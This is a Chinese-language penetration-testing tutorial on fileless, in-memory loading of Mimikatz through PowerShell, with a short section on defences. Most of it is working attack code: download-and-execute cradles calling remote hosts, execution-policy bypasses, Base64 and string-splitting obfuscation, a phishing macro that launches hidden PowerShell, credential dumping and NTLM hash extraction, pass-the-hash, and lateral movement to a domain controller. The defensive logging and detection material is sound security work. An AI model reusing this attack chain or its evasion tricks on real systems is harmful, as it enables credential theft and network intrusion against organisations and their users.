PowerShell遠程加載Mimikatz完全指南：從原理到實戰

無文件攻擊技術是現代滲透測試的核心技能，掌握PowerShell遠程加載Mimikatz對白帽子黑客至關重要

1 引言

在當今的網絡安全領域，無文件攻擊(fileless attack)已成為高級持久性威脅(APT)的主要手段之一。PowerShell作為Windows系統的強大管理工具，不僅為系統管理員提供了便捷的管理方式，同時也被安全研究人員和攻擊者廣泛利用。通過PowerShell遠程加載Mimikatz，攻擊者可以避免將敏感工具寫入磁盤，從而繞過傳統基于文件掃描的安全防護措施。

本文將從技術原理、實戰方法、規避技巧到防御檢測，全面解析PowerShell遠程加載Mimikatz的完整技術棧，幫助安全從業人員更好地理解和防御此類攻擊。

2 技術原理與優勢

2.1 PowerShell遠程加載機制

PowerShell提供了多種執行遠程代碼的方式，其中最常用的是Invoke-Expression(IEX)cmdlet與.NET WebClient類的結合：

# 基本遠程加載結構
IEX (New-Object Net.WebClient).DownloadString('http://遠程服務器/腳本.ps1')

這條命令完成了三個關鍵操作：

1. 使用New-Object Net.WebClient創建Web客戶端對象
2. 調用DownloadString方法從遠程URL下載腳本內容
3. 通過IEX直接執行下載的腳本內容

2.2 無文件攻擊的優勢

與傳統攻擊方式相比，PowerShell遠程加載具有顯著優勢：

• 無文件落地：惡意代碼不寫入磁盤，避免被傳統殺毒軟件檢測
• 內存執行：所有操作在內存中完成，取證困難
• 系統原生工具：利用系統自帶工具，減少可疑行為
• 高度靈活性：可隨時更新遠程腳本，無需重新部署

3 實戰方法與命令示例

3.1 基礎遠程加載方法

直接從HTTP服務器加載：

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

使用HTTPS加密傳輸（更隱蔽）：

powershell -c "IEX(New-Object Net.WebClient).DownloadString('https://example.com/scripts/mimikatz.ps1'); Invoke-Mimikatz -Command 'privilege::debug' 'sekurlsa::logonpasswords'"

3.2 繞過執行策略的技巧

Windows默認限制PowerShell腳本執行，需要繞過執行策略：

使用Bypass參數：

powershell -ExecutionPolicy Bypass -File "\\網絡路徑\Invoke-Mimikatz.ps1"

Unencoded命令方式（適用于簡單命令）：

powershell -ExecutionPolicy Unrestricted -Command "IEX(New-Object Net.WebClient).DownloadString('http://example.com/Invoke-Mimikatz.ps1')"

3.3 Base64編碼混淆

為了避免命令中的關鍵字符串被檢測，可以使用Base64編碼：

# 生成編碼命令
$command = "IEX(New-Object Net.WebClient).DownloadString('http://example.com/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)# 執行編碼后的命令
powershell -EncodedCommand $encodedCommand

3.4 替代下載方法

當WebClient被監控或阻止時，可以使用替代方法：

使用Invoke-WebRequest（PowerShell 3.0+）：

IEX (Invoke-WebRequest -Uri 'http://example.com/Invoke-Mimikatz.ps1' -UseBasicParsing).Content

使用BitsTransfer（適合大文件）：

Import-Module BitsTransfer
Start-BitsTransfer -Source 'http://example.com/Invoke-Mimikatz.ps1' -Destination '$env:TEMP\mimikatz.ps1'
IEX (Get-Content '$env:TEMP\mimikatz.ps1' -Raw)

4 高級規避技術

4.1 字符串分割與混淆

避免使用完整的可檢測字符串：

# 字符串分割技巧
$url = 'http'+'://example.com/Invoke-Mimikatz.ps1'
$downloader = New-Object Net.WebClient
$script = $downloader.DownloadString($url)
Invoke-Expression $script

4.2 內存補丁與API調用

直接調用Windows API實現更隱蔽的加載：

# 使用Win32 API直接加載DLL到內存
$Source = @"
using System;
using System.Runtime.InteropServices;
namespace Win32 {public class API {[DllImport("kernel32")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);[DllImport("kernel32")]public static extern IntPtr LoadLibrary(string name);[DllImport("kernel32")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);}
}
"@Add-Type -TypeDefinition $Source -Language CSharp
# 后續可以編寫更高級的內存加載代碼

4.3 降級與兼容性處理

處理不同PowerShell版本兼容性問題：

# 檢查PowerShell版本并選擇合適的方法
if ($PSVersionTable.PSVersion.Major -ge 3) {IEX (Invoke-WebRequest -Uri 'http://example.com/Invoke-Mimikatz.ps1' -UseBasicParsing).Content
} else {IEX (New-Object Net.WebClient).DownloadString('http://example.com/Invoke-Mimikatz.ps1')
}

5 防御與檢測策略

5.1 預防措施

強化PowerShell執行策略：

# 設置受限執行策略
Set-ExecutionPolicy Restricted -Force# 僅允許簽名腳本執行
Set-ExecutionPolicy AllSigned -Force

禁用PowerShell v2.0（舊版本更易被利用）：

# 檢查并禁用PowerShell v2.0
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2

5.2 監控與檢測

啟用PowerShell模塊日志記錄：

# 檢查當前日志設置
Get-WinEvent -ListLog "Microsoft-Windows-PowerShell/Operational" -ErrorAction SilentlyContinue# 啟用腳本塊日志記錄（推薦）
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force

監控敏感命令序列：

-- 示例：SIEM查詢檢測Mimikatz加載行為
SELECT * FROM SecurityEvent 
WHERE EventID = 4688 AND 
(CommandLine LIKE '%DownloadString%' AND CommandLine LIKE '%mimikatz%') 
OR (CommandLine LIKE '%IEX%' AND CommandLine LIKE '%net.webclient%')

5.3 應用程序控制

實施約束語言模式：

# 啟用約束語言模式
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

使用Windows Defender Application Control（WDAC）：

# 創建WDAC策略示例
New-CIPolicy -Level FilePublisher -FilePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -PolicyPath "C:\Policy.xml" -UserPEs

6 實戰案例：完整的攻擊鏈

6.1 初始入侵階段

通過釣魚郵件獲取初始訪問：

# 偽裝的Word文檔宏代碼
Sub AutoOpen()Dim payload As Stringpayload = "powershell -w hidden -c ""IEX(New-Object Net.WebClient).DownloadString('http://example.com/Invoke-Mimikatz.ps1')"""Shell payload, vbHide
End Sub

6.2 權限提升與憑據獲取

加載Mimikatz獲取憑證：

# 內存加載并執行Mimikatz
IEX (New-Object Net.WebClient).DownloadString('http://example.com/Invoke-Mimikatz.ps1')# 提取本地憑證
$creds = Invoke-Mimikatz -Command "privilege::debug" "sekurlsa::logonpasswords"# 解析結果并提取NTLM哈希
$ntlmHash = ($creds | Select-String "NTLM\s+:\s+([a-f0-9]{32})").Matches.Groups[1].Value

6.3 橫向移動

使用獲取的哈希進行橫向移動：

# 哈希傳遞攻擊(PTH)
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:$ntlmHash"# 通過WinRM執行遠程命令
$session = New-PSSession -ComputerName DC01.corp.local -Credential (New-Object System.Management.Automation.PSCredential("Administrator", (ConvertTo-SecureString "Password123" -AsPlainText -Force)))
Invoke-Command -Session $session -ScriptBlock { IEX(New-Object Net.WebClient).DownloadString('http://example.com/Invoke-Mimikatz.ps1') }

7 結語

PowerShell遠程加載Mimikatz技術代表了現代無文件攻擊的典型手法，它充分利用了系統原生工具的強大功能，同時規避了傳統安全產品的檢測。作為安全從業人員，深入理解這些技術不僅有助于進行有效的滲透測試，更能為構建全面的防御體系提供寶貴 insights。

關鍵要點總結：

1. PowerShell遠程加載提供了無文件攻擊能力，難以被傳統安全產品檢測
2. 多種繞過技術可以規避執行策略和安全監控
3. 全面的防御需要多層策略：預防、檢測和響應相結合
4. 持續監控和日志分析是發現此類攻擊的關鍵

最后，我們必須強調：這些技術只應在合法授權的安全測試中使用。未經授權的使用違反法律且違背職業道德。白帽子黑客的職責是幫助組織提高安全性，而不是利用漏洞進行非法活動。

---

本文僅用于安全研究和教育目的，所有技術細節都應在獲得明確授權的前提下使用。未經授權的網絡入侵是違法行為，需承擔法律責任。